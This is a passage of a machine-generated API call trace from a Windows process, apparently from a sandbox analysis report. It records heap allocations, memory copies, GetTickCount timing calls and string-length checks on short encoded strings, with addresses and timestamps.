(param_1="%c2%b9%6a%c2%a9%c2%8d") returned 0x15 [0101.405] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484c60 [0101.405] memcpy (in: _Dst=0x24adf9be6c8, _Src=0x24ae1484c60, _Size=0x8 | out: _Dst=0x24adf9be6c8) returned 0x24adf9be6c8 [0101.405] free (_Block=0x24ae1484c60) [0101.405] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="¹", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.405] memcpy (in: _Dst=0x24adf9bddd8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bddd8) returned 0x24adf9bddd8 [0101.405] malloc (_Size=0x28) returned 0x24ae13949d0 [0101.405] memcpy (in: _Dst=0x24adf9bef0e, _Src=0x24ae1a0f820, _Size=0x10 | out: _Dst=0x24adf9bef0e) returned 0x24adf9bef0e [0101.405] memcpy (in: _Dst=0x24adf9bef08, _Src=0x24adf9bddd8, _Size=0x6 | out: _Dst=0x24adf9bef08) returned 0x24adf9bef08 [0101.406] free (_Block=0x24ae13949d0) [0101.406] malloc (_Size=0x28) returned 0x24ae1394c10 [0101.406] malloc (_Size=0x28) returned 0x24ae1394c40 [0101.407] malloc (_Size=0x28) returned 0x24ae13949d0 [0101.407] GetTickCount () returned 0x210d568 [0101.407] malloc (_Size=0x28) returned 0x24ae1394bb0 [0101.407] malloc (_Size=0x28) returned 0x24ae1394c70 [0101.407] memcpy (in: _Dst=0x24adf9be642, _Src=0x24adf9be178, _Size=0x2 | out: _Dst=0x24adf9be642) returned 0x24adf9be642 [0101.407] memcpy (in: _Dst=0x24adf9be640, _Src=0x24adf9bdfb8, _Size=0x2 | out: _Dst=0x24adf9be640) returned 0x24adf9be640 [0101.407] memcpy (in: _Dst=0x24adf9be63e, _Src=0x24adf9bdef8, _Size=0x2 | out: _Dst=0x24adf9be63e) returned 0x24adf9be63e [0101.407] memcpy (in: _Dst=0x24adf9be63c, _Src=0x24adf9bded8, _Size=0x2 | out: _Dst=0x24adf9be63c) returned 0x24adf9be63c [0101.407] memcpy (in: _Dst=0x24adf9be63a, _Src=0x24adf9bdeb8, _Size=0x2 | out: _Dst=0x24adf9be63a) returned 0x24adf9be63a [0101.407] memcpy (in: _Dst=0x24adf9be638, _Src=0x24adf9be278, _Size=0x2 | out: _Dst=0x24adf9be638) returned 0x24adf9be638 [0101.408] free (_Block=0x24ae1394c70) [0101.408] memcpy (in: _Dst=0x24adf9be0d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9be0d8) returned 0x24adf9be0d8 [0101.408] malloc (_Size=0x28) returned 0x24ae1394d90 [0101.408] memcpy (in: _Dst=0x24adf9be72c, _Src=0x24adf9be0d8, _Size=0x4 | out: _Dst=0x24adf9be72c) returned 0x24adf9be72c [0101.408] memcpy (in: _Dst=0x24adf9be728, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be728) returned 0x24adf9be728 [0101.408] free (_Block=0x24ae1394d90) [0101.408] memcpy (in: _Dst=0x24adf9be138, _Src=0x24adf9be72c, _Size=0x4 | out: _Dst=0x24adf9be138) returned 0x24adf9be138 [0101.408] malloc (_Size=0x28) returned 0x24ae1394700 [0101.409] memcpy (in: _Dst=0x24adf9be1b8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9be1b8) returned 0x24adf9be1b8 [0101.409] malloc (_Size=0x28) returned 0x24ae13946a0 [0101.409] memcpy (in: _Dst=0x24adf9be93c, _Src=0x24adf9be1b8, _Size=0x4 | out: _Dst=0x24adf9be93c) returned 0x24adf9be93c [0101.409] memcpy (in: _Dst=0x24adf9be938, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be938) returned 0x24adf9be938 [0101.410] free (_Block=0x24ae13946a0) [0101.410] memcpy (in: _Dst=0x24adf9be1d8, _Src=0x24adf9be93c, _Size=0x4 | out: _Dst=0x24adf9be1d8) returned 0x24adf9be1d8 [0101.410] malloc (_Size=0x28) returned 0x24ae1394730 [0101.410] malloc (_Size=0x28) returned 0x24ae1394c70 [0101.410] memcpy (in: _Dst=0x24adf9be1f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9be1f8) returned 0x24adf9be1f8 [0101.410] malloc (_Size=0x28) returned 0x24ae1394880 [0101.410] memcpy (in: _Dst=0x24adf9be57c, _Src=0x24adf9be1f8, _Size=0x4 | out: _Dst=0x24adf9be57c) returned 0x24adf9be57c [0101.410] memcpy (in: _Dst=0x24adf9be578, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be578) returned 0x24adf9be578 [0101.411] free (_Block=0x24ae1394880) [0101.411] memcpy (in: _Dst=0x24adf9ba9b8, _Src=0x24adf9be57c, _Size=0x4 | out: _Dst=0x24adf9ba9b8) returned 0x24adf9ba9b8 [0101.411] malloc (_Size=0x28) returned 0x24ae1394790 [0101.411] malloc (_Size=0x28) returned 0x24ae13946a0 [0101.411] memcpy (in: _Dst=0x24adf9ba7f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba7f8) returned 0x24adf9ba7f8 [0101.411] malloc (_Size=0x28) returned 0x24ae1394ca0 [0101.411] memcpy (in: _Dst=0x24adf9be5ac, _Src=0x24adf9ba7f8, _Size=0x4 | out: _Dst=0x24adf9be5ac) returned 0x24adf9be5ac [0101.411] memcpy (in: _Dst=0x24adf9be5a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be5a8) returned 0x24adf9be5a8 [0101.412] free (_Block=0x24ae1394ca0) [0101.412] memcpy (in: _Dst=0x24adf9ba8d8, _Src=0x24adf9be5ac, _Size=0x4 | out: _Dst=0x24adf9ba8d8) returned 0x24adf9ba8d8 [0101.412] malloc (_Size=0x28) returned 0x24ae1394ca0 [0101.412] malloc (_Size=0x28) returned 0x24ae1394cd0 [0101.412] memcpy (in: _Dst=0x24adf9ba9f8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba9f8) returned 0x24adf9ba9f8 [0101.412] malloc (_Size=0x28) returned 0x24ae1394af0 [0101.412] memcpy (in: _Dst=0x24adf9be7ec, _Src=0x24adf9ba9f8, _Size=0x4 | out: _Dst=0x24adf9be7ec) returned 0x24adf9be7ec [0101.412] memcpy (in: _Dst=0x24adf9be7e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be7e8) returned 0x24adf9be7e8 [0101.412] free (_Block=0x24ae1394af0) [0101.412] memcpy (in: _Dst=0x24adf9baa98, _Src=0x24adf9be7ec, _Size=0x4 | out: _Dst=0x24adf9baa98) returned 0x24adf9baa98 [0101.412] malloc (_Size=0x28) returned 0x24ae1394880 [0101.413] malloc (_Size=0x28) returned 0x24ae13948b0 [0101.413] memcpy (in: _Dst=0x24adf9ba618, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba618) returned 0x24adf9ba618 [0101.413] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.413] memcpy (in: _Dst=0x24adf9be6fc, _Src=0x24adf9ba618, _Size=0x4 | out: _Dst=0x24adf9be6fc) returned 0x24adf9be6fc [0101.413] memcpy (in: _Dst=0x24adf9be6f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be6f8) returned 0x24adf9be6f8 [0101.413] free (_Block=0x24ae1394a00) [0101.413] memcpy (in: _Dst=0x24adf9bab18, _Src=0x24adf9be6fc, _Size=0x4 | out: _Dst=0x24adf9bab18) returned 0x24adf9bab18 [0101.413] malloc (_Size=0x28) returned 0x24ae1394df0 [0101.413] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.413] memcpy (in: _Dst=0x24adf9ac9a8, _Src=0x24adf9bab18, _Size=0x4 | out: _Dst=0x24adf9ac9a8) returned 0x24adf9ac9a8 [0101.414] memcpy (in: _Dst=0x24adf9ac9a6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac9a6) returned 0x24adf9ac9a6 [0101.414] memcpy (in: _Dst=0x24adf9ac9a2, _Src=0x24adf9baa98, _Size=0x4 | out: _Dst=0x24adf9ac9a2) returned 0x24adf9ac9a2 [0101.414] memcpy (in: _Dst=0x24adf9ac9a0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac9a0) returned 0x24adf9ac9a0 [0101.414] memcpy (in: _Dst=0x24adf9ac99c, _Src=0x24adf9ba8d8, _Size=0x4 | out: _Dst=0x24adf9ac99c) returned 0x24adf9ac99c [0101.414] memcpy (in: _Dst=0x24adf9ac99a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac99a) returned 0x24adf9ac99a [0101.414] memcpy (in: _Dst=0x24adf9ac996, _Src=0x24adf9ba9b8, _Size=0x4 | out: _Dst=0x24adf9ac996) returned 0x24adf9ac996 [0101.414] memcpy (in: _Dst=0x24adf9ac994, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac994) returned 0x24adf9ac994 [0101.414] memcpy (in: _Dst=0x24adf9ac990, _Src=0x24adf9be1d8, _Size=0x4 | out: _Dst=0x24adf9ac990) returned 0x24adf9ac990 [0101.414] memcpy (in: _Dst=0x24adf9ac98e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac98e) returned 0x24adf9ac98e [0101.414] memcpy (in: _Dst=0x24adf9ac98a, _Src=0x24adf9be138, _Size=0x4 | out: _Dst=0x24adf9ac98a) returned 0x24adf9ac98a [0101.414] memcpy (in: _Dst=0x24adf9ac988, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9ac988) returned 0x24adf9ac988 [0101.414] free (_Block=0x24ae1394a00) [0101.414] SysStringLen (param_1="%71%c2%be%3e%c3%90") returned 0x12 [0101.415] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484d30 [0101.415] memcpy (in: _Dst=0x24adf9be758, _Src=0x24ae1484d30, _Size=0x8 | out: _Dst=0x24adf9be758) returned 0x24adf9be758 [0101.415] free (_Block=0x24ae1484d30) [0101.415] memcpy (in: _Dst=0x24adf9ba4d8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9ba4d8) returned 0x24adf9ba4d8 [0101.415] malloc (_Size=0x28) returned 0x24ae1394d00 [0101.415] memcpy (in: _Dst=0x24adf9bec6e, _Src=0x24ae1a0f820, _Size=0x10 | out: _Dst=0x24adf9bec6e) returned 0x24adf9bec6e [0101.415] memcpy (in: _Dst=0x24adf9bec68, _Src=0x24adf9ba4d8, _Size=0x6 | out: _Dst=0x24adf9bec68) returned 0x24adf9bec68 [0101.415] free (_Block=0x24ae1394d00) [0101.415] malloc (_Size=0x70) returned 0x24ae1470620 [0101.416] malloc (_Size=0x28) returned 0x24ae1394a00 [0101.416] malloc (_Size=0x28) returned 0x24ae1394d00 [0101.416] malloc (_Size=0x28) returned 0x24ae1394a30 [0101.416] malloc (_Size=0x28) returned 0x24ae1394a60 [0101.417] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.417] memcpy (in: _Dst=0x24adf9bea92, _Src=0x24adf9ba4f8, _Size=0x2 | out: _Dst=0x24adf9bea92) returned 0x24adf9bea92 [0101.417] memcpy (in: _Dst=0x24adf9bea90, _Src=0x24adf9ba798, _Size=0x2 | out: _Dst=0x24adf9bea90) returned 0x24adf9bea90 [0101.417] memcpy (in: _Dst=0x24adf9bea8e, _Src=0x24adf9bab78, _Size=0x2 | out: _Dst=0x24adf9bea8e) returned 0x24adf9bea8e [0101.417] memcpy (in: _Dst=0x24adf9bea8c, _Src=0x24adf9baab8, _Size=0x2 | out: _Dst=0x24adf9bea8c) returned 0x24adf9bea8c [0101.417] memcpy (in: _Dst=0x24adf9bea8a, _Src=0x24adf9baa38, _Size=0x2 | out: _Dst=0x24adf9bea8a) returned 0x24adf9bea8a [0101.417] memcpy (in: _Dst=0x24adf9bea88, _Src=0x24adf9ba6f8, _Size=0x2 | out: _Dst=0x24adf9bea88) returned 0x24adf9bea88 [0101.417] free (_Block=0x24ae1394d60) [0101.418] memcpy (in: _Dst=0x24adf9bac18, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bac18) returned 0x24adf9bac18 [0101.418] malloc (_Size=0x28) returned 0x24ae1394a90 [0101.418] memcpy (in: _Dst=0x24adf9be87c, _Src=0x24adf9bac18, _Size=0x4 | out: _Dst=0x24adf9be87c) returned 0x24adf9be87c [0101.418] memcpy (in: _Dst=0x24adf9be878, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be878) returned 0x24adf9be878 [0101.418] free (_Block=0x24ae1394a90) [0101.418] memcpy (in: _Dst=0x24adf9bab98, _Src=0x24adf9be87c, _Size=0x4 | out: _Dst=0x24adf9bab98) returned 0x24adf9bab98 [0101.418] malloc (_Size=0x28) returned 0x24ae1394a90 [0101.419] memcpy (in: _Dst=0x24adf9ba478, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba478) returned 0x24adf9ba478 [0101.419] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.419] memcpy (in: _Dst=0x24adf9be9fc, _Src=0x24adf9ba478, _Size=0x4 | out: _Dst=0x24adf9be9fc) returned 0x24adf9be9fc [0101.419] memcpy (in: _Dst=0x24adf9be9f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9be9f8) returned 0x24adf9be9f8 [0101.419] free (_Block=0x24ae1394d60) [0101.419] memcpy (in: _Dst=0x24adf9ba498, _Src=0x24adf9be9fc, _Size=0x4 | out: _Dst=0x24adf9ba498) returned 0x24adf9ba498 [0101.419] malloc (_Size=0x28) returned 0x24ae1394ac0 [0101.419] malloc (_Size=0x28) returned 0x24ae1394af0 [0101.420] memcpy (in: _Dst=0x24adf9ba8b8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba8b8) returned 0x24adf9ba8b8 [0101.420] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.420] memcpy (in: _Dst=0x24adf9beb7c, _Src=0x24adf9ba8b8, _Size=0x4 | out: _Dst=0x24adf9beb7c) returned 0x24adf9beb7c [0101.420] memcpy (in: _Dst=0x24adf9beb78, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9beb78) returned 0x24adf9beb78 [0101.420] free (_Block=0x24ae1394d60) [0101.420] memcpy (in: _Dst=0x24adf9ba5f8, _Src=0x24adf9beb7c, _Size=0x4 | out: _Dst=0x24adf9ba5f8) returned 0x24adf9ba5f8 [0101.420] malloc (_Size=0x28) returned 0x24ae1394d60 [0101.420] malloc (_Size=0x28) returned 0x24ae1394d90 [0101.421] memcpy (in: _Dst=0x24adf9ba638, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba638) returned 0x24adf9ba638 [0101.421] malloc (_Size=0x28) returned 0x24ae1394dc0 [0101.421] memcpy (in: _Dst=0x24adf9bea2c, _Src=0x24adf9ba638, _Size=0x4 | out: _Dst=0x24adf9bea2c) returned 0x24adf9bea2c [0101.421] memcpy (in: _Dst=0x24adf9bea28, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bea28) returned 0x24adf9bea28 [0101.421] free (_Block=0x24ae1394dc0) [0101.421] memcpy (in: _Dst=0x24adf9ba518, _Src=0x24adf9bea2c, _Size=0x4 | out: _Dst=0x24adf9ba518) returned 0x24adf9ba518 [0101.422] malloc (_Size=0x28) returned 0x24ae1394dc0 [0101.422] malloc (_Size=0x28) returned 0x24ae1394670 [0101.422] memcpy (in: _Dst=0x24adf9babb8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9babb8) returned 0x24adf9babb8 [0101.422] malloc (_Size=0x28) returned 0x24ae139dd00 [0101.422] memcpy (in: _Dst=0x24adf9bebdc, _Src=0x24adf9babb8, _Size=0x4 | out: _Dst=0x24adf9bebdc) returned 0x24adf9bebdc [0101.422] memcpy (in: _Dst=0x24adf9bebd8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bebd8) returned 0x24adf9bebd8 [0101.423] free (_Block=0x24ae139dd00) [0101.423] memcpy (in: _Dst=0x24adf9ba818, _Src=0x24adf9bebdc, _Size=0x4 | out: _Dst=0x24adf9ba818) returned 0x24adf9ba818 [0101.423] malloc (_Size=0x28) returned 0x24ae139e000 [0101.423] malloc (_Size=0x28) returned 0x24ae139dfd0 [0101.423] memcpy (in: _Dst=0x24adf9ba538, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9ba538) returned 0x24adf9ba538 [0101.423] malloc (_Size=0x28) returned 0x24ae139db50 [0101.423] memcpy (in: _Dst=0x24adf9bec9c, _Src=0x24adf9ba538, _Size=0x4 | out: _Dst=0x24adf9bec9c) returned 0x24adf9bec9c [0101.423] memcpy (in: _Dst=0x24adf9bec98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bec98) returned 0x24adf9bec98 [0101.424] free (_Block=0x24ae139db50) [0101.424] malloc (_Size=0x28) returned 0x24ae139e0f0 [0101.424] malloc (_Size=0x28) returned 0x24ae139d970 [0101.424] GetTickCount () returned 0x210d578 [0101.425] free (_Block=0x24ae139d970) [0101.425] SysStringLen (param_1="%c2%b6%7d%c2%8d%3a") returned 0x12 [0101.425] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1484920 [0101.425] free (_Block=0x24ae1484920) [0101.425] malloc (_Size=0x2e0) returned 0x24ae1390c90 [0101.425] malloc (_Size=0x20) returned 0x24ae139e030 [0101.425] malloc (_Size=0x288) returned 0x24ae148dfe0 [0101.425] GetTickCount () returned 0x210d587 [0101.425] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139ce50 [0101.426] realloc (_Block=0x24ae139e030, _Size=0x40) returned 0x24ae14807d0 [0101.426] realloc (_Block=0x24ae139ce50, _Size=0x280) returned 0x24ae148d5a0 [0101.426] GetTickCount () returned 0x210d587 [0101.426] malloc (_Size=0x508) returned 0x24ae1488350 [0101.426] GetTickCount () returned 0x210d587 [0101.426] realloc (_Block=0x24ae14807d0, _Size=0x80) returned 0x24ae1482cc0 [0101.426] realloc (_Block=0x24ae148d5a0, _Size=0x500) returned 0x24ae1488860 [0101.426] GetTickCount () returned 0x210d587 [0101.426] GetTickCount () returned 0x210d587 [0101.426] malloc (_Size=0xa08) returned 0x24ae13b2990 [0101.426] GetTickCount () returned 0x210d587 [0101.426] realloc (_Block=0x24ae1482cc0, _Size=0x100) returned 0x24ae1474880 [0101.426] GetTickCount () returned 0x210d587 [0101.426] realloc (_Block=0x24ae1488860, _Size=0xa00) returned 0x24ae13b47c0 [0101.426] GetTickCount () returned 0x210d587 [0101.426] GetTickCount () returned 0x210d587 [0101.426] GetTickCount () returned 0x210d587 [0101.426] GetTickCount () returned 0x210d587 [0101.427] malloc (_Size=0x1408) returned 0x24ae1392090 [0101.427] GetTickCount () returned 0x210d587 [0101.427] realloc (_Block=0x24ae1474880, _Size=0x200) returned 0x24ae13b8f80 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] realloc (_Block=0x24ae13b47c0, _Size=0x1400) returned 0x24ae13967c0 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] GetTickCount () returned 0x210d587 [0101.427] malloc (_Size=0x2808) returned 0x24ae1397bd0 [0101.428] GetTickCount () returned 0x210d587 [0101.429] GetTickCount () returned 0x210d587 [0101.431] GetTickCount () returned 0x210d587 [0101.433] GetTickCount () returned 0x210d587 [0101.435] GetTickCount () returned 0x210d587 [0101.438] GetTickCount () returned 0x210d587 [0101.441] GetTickCount () returned 0x210d597 [0101.443] GetTickCount () returned 0x210d597 [0101.445] GetTickCount () returned 0x210d597 [0101.447] GetTickCount () returned 0x210d597 [0101.449] GetTickCount () returned 0x210d597 [0101.452] GetTickCount () returned 0x210d597 [0101.455] malloc (_Size=0x28) returned 0x24ae139e090 [0101.455] malloc (_Size=0x28) returned 0x24ae139de80 [0101.455] GetTickCount () returned 0x210d597 [0101.455] malloc (_Size=0x28) returned 0x24ae139d9a0 [0101.455] memcpy (in: _Dst=0x24adf9bed2e, _Src=0x24adf9ba858, _Size=0x2 | out: _Dst=0x24adf9bed2e) returned 0x24adf9bed2e [0101.455] memcpy (in: _Dst=0x24adf9bed2c, _Src=0x24adf9ba658, _Size=0x2 | out: _Dst=0x24adf9bed2c) returned 0x24adf9bed2c [0101.455] memcpy (in: _Dst=0x24adf9bed2a, _Src=0x24adf9ba558, _Size=0x2 | out: _Dst=0x24adf9bed2a) returned 0x24adf9bed2a [0101.455] memcpy (in: _Dst=0x24adf9bed28, _Src=0x24adf9ba838, _Size=0x2 | out: _Dst=0x24adf9bed28) returned 0x24adf9bed28 [0101.456] free (_Block=0x24ae139d9a0) [0101.466] memcpy (in: _Dst=0x24adf9ba578, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9ba578) returned 0x24adf9ba578 [0101.466] malloc (_Size=0x28) returned 0x24ae139dac0 [0101.466] memcpy (in: _Dst=0x24adf9bf26e, _Src=0x24ae1a0f820, _Size=0x10 | out: _Dst=0x24adf9bf26e) returned 0x24adf9bf26e [0101.466] memcpy (in: _Dst=0x24adf9bf268, _Src=0x24adf9ba578, _Size=0x6 | out: _Dst=0x24adf9bf268) returned 0x24adf9bf268 [0101.467] free (_Block=0x24ae139dac0) [0101.468] GetTickCount () returned 0x210d5a7 [0101.468] malloc (_Size=0x28) returned 0x24ae139dbe0 [0101.468] malloc (_Size=0x28) returned 0x24ae139dd90 [0101.469] malloc (_Size=0x28) returned 0x24ae139e060 [0101.469] malloc (_Size=0x28) returned 0x24ae139ddf0 [0101.469] malloc (_Size=0x28) returned 0x24ae139dbb0 [0101.469] memcpy (in: _Dst=0x24adf9bf0c2, _Src=0x24adf9baad8, _Size=0x2 | out: _Dst=0x24adf9bf0c2) returned 0x24adf9bf0c2 [0101.469] memcpy (in: _Dst=0x24adf9bf0c0, _Src=0x24adf9ba9d8, _Size=0x2 | out: _Dst=0x24adf9bf0c0) returned 0x24adf9bf0c0 [0101.469] memcpy (in: _Dst=0x24adf9bf0be, _Src=0x24adf9ba918, _Size=0x2 | out: _Dst=0x24adf9bf0be) returned 0x24adf9bf0be [0101.470] memcpy (in: _Dst=0x24adf9bf0bc, _Src=0x24adf9ba938, _Size=0x2 | out: _Dst=0x24adf9bf0bc) returned 0x24adf9bf0bc [0101.470] memcpy (in: _Dst=0x24adf9bf0ba, _Src=0x24adf9baa18, _Size=0x2 | out: _Dst=0x24adf9bf0ba) returned 0x24adf9bf0ba [0101.470] memcpy (in: _Dst=0x24adf9bf0b8, _Src=0x24adf9ba5b8, _Size=0x2 | out: _Dst=0x24adf9bf0b8) returned 0x24adf9bf0b8 [0101.470] free (_Block=0x24ae139dbb0) [0101.470] memcpy (in: _Dst=0x24adf9ba6d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba6d8) returned 0x24adf9ba6d8 [0101.470] malloc (_Size=0x28) returned 0x24ae139dee0 [0101.471] memcpy (in: _Dst=0x24adf9bf14c, _Src=0x24adf9ba6d8, _Size=0x4 | out: _Dst=0x24adf9bf14c) returned 0x24adf9bf14c [0101.471] memcpy (in: _Dst=0x24adf9bf148, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf148) returned 0x24adf9bf148 [0101.472] free (_Block=0x24ae139dee0) [0101.510] memcpy (in: _Dst=0x24adf9ba678, _Src=0x24adf9bf14c, _Size=0x4 | out: _Dst=0x24adf9ba678) returned 0x24adf9ba678 [0101.510] malloc (_Size=0x28) returned 0x24ae139dc10 [0101.511] memcpy (in: _Dst=0x24adf9ba698, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba698) returned 0x24adf9ba698 [0101.511] malloc (_Size=0x28) returned 0x24ae139de50 [0101.511] memcpy (in: _Dst=0x24adf9bf3ec, _Src=0x24adf9ba698, _Size=0x4 | out: _Dst=0x24adf9bf3ec) returned 0x24adf9bf3ec [0101.511] memcpy (in: _Dst=0x24adf9bf3e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf3e8) returned 0x24adf9bf3e8 [0101.512] free (_Block=0x24ae139de50) [0101.512] memcpy (in: _Dst=0x24adf9ba738, _Src=0x24adf9bf3ec, _Size=0x4 | out: _Dst=0x24adf9ba738) returned 0x24adf9ba738 [0101.512] malloc (_Size=0x28) returned 0x24ae139e0c0 [0101.512] malloc (_Size=0x28) returned 0x24ae139e030 [0101.513] memcpy (in: _Dst=0x24adf9ba778, _Src=0xd6788fa660, _Size=0x2 | out: _Dst=0x24adf9ba778) returned 0x24adf9ba778 [0101.513] malloc (_Size=0x28) returned 0x24ae139df40 [0101.513] memcpy (in: _Dst=0x24adf9ba7bc, _Src=0x24adf9ba778, _Size=0x2 | out: _Dst=0x24adf9ba7bc) returned 0x24adf9ba7bc [0101.513] memcpy (in: _Dst=0x24adf9ba7b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba7b8) returned 0x24adf9ba7b8 [0101.514] free (_Block=0x24ae139df40) [0101.514] memcpy (in: _Dst=0x24adf9ba978, _Src=0x24adf9ba7ba, _Size=0x4 | out: _Dst=0x24adf9ba978) returned 0x24adf9ba978 [0101.514] malloc (_Size=0x28) returned 0x24ae139dcd0 [0101.514] malloc (_Size=0x28) returned 0x24ae139db80 [0101.514] memcpy (in: _Dst=0x24adf9ba998, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9ba998) returned 0x24adf9ba998 [0101.514] malloc (_Size=0x28) returned 0x24ae139d9a0 [0101.514] memcpy (in: _Dst=0x24adf9bf0ec, _Src=0x24adf9ba998, _Size=0x4 | out: _Dst=0x24adf9bf0ec) returned 0x24adf9bf0ec [0101.514] memcpy (in: _Dst=0x24adf9bf0e8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf0e8) returned 0x24adf9bf0e8 [0101.515] free (_Block=0x24ae139d9a0) [0101.515] memcpy (in: _Dst=0x24adf9baa58, _Src=0x24adf9bf0ec, _Size=0x4 | out: _Dst=0x24adf9baa58) returned 0x24adf9baa58 [0101.515] malloc (_Size=0x28) returned 0x24ae139dac0 [0101.515] malloc (_Size=0x28) returned 0x24ae139dc40 [0101.515] GetTickCount () returned 0x210d5d6 [0101.515] GetTickCount () returned 0x210d5d6 [0101.516] memcpy (in: _Dst=0x24adf9baa78, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9baa78) returned 0x24adf9baa78 [0101.516] malloc (_Size=0x28) returned 0x24ae139d970 [0101.516] GetTickCount () returned 0x210d5d6 [0101.516] memcpy (in: _Dst=0x24adf9bf1ac, _Src=0x24adf9baa78, _Size=0x4 | out: _Dst=0x24adf9bf1ac) returned 0x24adf9bf1ac [0101.516] memcpy (in: _Dst=0x24adf9bf1a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bf1a8) returned 0x24adf9bf1a8 [0101.517] free (_Block=0x24ae139d970) [0101.517] GetTickCount () returned 0x210d5d6 [0101.517] memcpy (in: _Dst=0x24adf9baaf8, _Src=0x24adf9bf1ac, _Size=0x4 | out: _Dst=0x24adf9baaf8) returned 0x24adf9baaf8 [0101.517] malloc (_Size=0x28) returned 0x24ae139dc70 [0101.517] GetTickCount () returned 0x210d5d6 [0101.517] malloc (_Size=0x28) returned 0x24ae139dee0 [0101.517] GetTickCount () returned 0x210d5d6 [0101.517] GetTickCount () returned 0x210d5d6 [0101.518] GetTickCount () returned 0x210d5d6 [0101.518] memcpy (in: _Dst=0x24adf9bb218, _Src=0xd6788fa660, _Size=0x2 | out: _Dst=0x24adf9bb218) returned 0x24adf9bb218 [0101.518] malloc (_Size=0x28) returned 0x24ae139df10 [0101.518] GetTickCount () returned 0x210d5d6 [0101.519] memcpy (in: _Dst=0x24adf9baedc, _Src=0x24adf9bb218, _Size=0x2 | out: _Dst=0x24adf9baedc) returned 0x24adf9baedc [0101.519] memcpy (in: _Dst=0x24adf9baed8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9baed8) returned 0x24adf9baed8 [0101.520] free (_Block=0x24ae139df10) [0101.520] GetTickCount () returned 0x210d5e5 [0101.520] memcpy (in: _Dst=0x24adf9baeb8, _Src=0x24adf9baeda, _Size=0x4 | out: _Dst=0x24adf9baeb8) returned 0x24adf9baeb8 [0101.520] malloc (_Size=0x28) returned 0x24ae139dca0 [0101.520] GetTickCount () returned 0x210d5e5 [0101.520] malloc (_Size=0x28) returned 0x24ae139dd00 [0101.521] GetTickCount () returned 0x210d5e5 [0101.521] memcpy (in: _Dst=0x24adf9a5608, _Src=0x24adf9baeb8, _Size=0x4 | out: _Dst=0x24adf9a5608) returned 0x24adf9a5608 [0101.521] memcpy (in: _Dst=0x24adf9a5606, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5606) returned 0x24adf9a5606 [0101.521] memcpy (in: _Dst=0x24adf9a5602, _Src=0x24adf9baaf8, _Size=0x4 | out: _Dst=0x24adf9a5602) returned 0x24adf9a5602 [0101.521] memcpy (in: _Dst=0x24adf9a5600, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5600) returned 0x24adf9a5600 [0101.521] memcpy (in: 